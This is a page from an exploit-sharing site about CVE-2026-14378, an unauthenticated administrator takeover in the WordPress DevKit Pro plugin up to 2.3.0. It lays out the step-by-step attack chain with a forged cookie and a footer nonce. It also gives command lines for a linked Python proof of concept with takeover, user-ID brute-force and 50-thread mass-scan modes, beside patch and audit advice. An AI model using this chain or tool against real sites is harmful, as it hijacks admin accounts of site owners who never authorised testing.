POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
WordPresscritical

CVE-2026-14378 — DevKit Pro ≤2.3.0 Unauthenticated Admin Takeover (User-Switch Revert)

October 2, 2026 · 63 views

WordPress DevKit Pro (dplugins) ≤2.3.0: forged original_user_id cookie + wp_footer revert_switch nonce; verify_nonce_and_capability checks manage_options for forged user, not current requester → wp_set_auth_cookie admin session. CVSS 9.8 Critical (CWE-287). Fixed 3.0.0+. Python PoC: check (footer oracle), admin exploit, mass scan 50 threads.

#wordpress#devkit-pro#dplugins#authentication-bypass#cwe-287#unauthenticated#critical#admin-takeover

CVE:

CVE-2026-14378

Date:

2026-10-02

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-14378 — DevKit Pro WordPress plugin (dplugins) — unauthenticated authentication bypass → full administrator session (Wordfence CNA; CVSS 3.1 9.8 Critical, CWE-287).

| | | |---|---| | Product | DevKit Pro | | Affected | ≤ 2.3.0 | | Fixed | ≥ 3.0.0 (changelog) | | Related | CVE-2026-14357 (subscriber+ theme ZIP — different bug) |

Users Manager stores prior identity in cookie original_user_id. With that cookie set, wp_footer exposes a switch-back form and nonce. revert_switch AJAX incorrectly validates manage_options against the forged user ID instead of the actual (unauthenticated) requester → wp_set_auth_cookie() for the target user.

PoC page: https://pocbit.org/pocs/cve-2026-14378

GitHub: murrez/CVE-2026-14378

CVE.org: CVE-2026-14378

Wordfence: Threat Intel

Attack chain (summary)

  1. Cookie: original_user_id=1 (or --user-id / --brute).
  2. GET public page → parse footer for revert_switch nonce (revert_switch, DPDEV_revert_switch, etc.).
  3. POST admin-ajax.php with action + nonce.
  4. Verify wordpress_logged_in_* and /wp-admin/ access.

Check mode is safe: confirms switch-back material without completing takeover. Users Manager is off by default on many sites—readme ≤2.3.0 without footer nonce means feature disabled or patched.

DevKit is not on wordpress.org; fingerprint uses exposed readme.txt when present (validates Plugin Name:, not HTTP 200 alone).

Bundled tool (Python 3.9+)

Download poc.py from this page (View exploit code).

pip install requests

python poc.py check https://target.example/
python poc.py check https://target.example/ --user-id 2 --timeout 40

python poc.py admin https://target.example/
python poc.py admin https://target.example/ --user-id 1 --brute 5 --log successes.txt

python poc.py targets.txt
python poc.py targets.txt admin

Mass mode: 50 worker threads (tune in script if rate-limited).

Discovery hints (your assets only)

Commercial plugin—hunt DevKit / dplugins footprints, staging hosts, and readme under custom plugin paths when exposed.

Remediation

  1. Upgrade DevKit Pro to ≥ 3.0.0.
  2. Disable Users Manager / user switching until patched.
  3. Audit admin-ajax.php for revert_switch with suspicious original_user_id cookies.

See WordPress plugin vulnerabilities guide.

Legal and ethical use

Authorized security testing only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →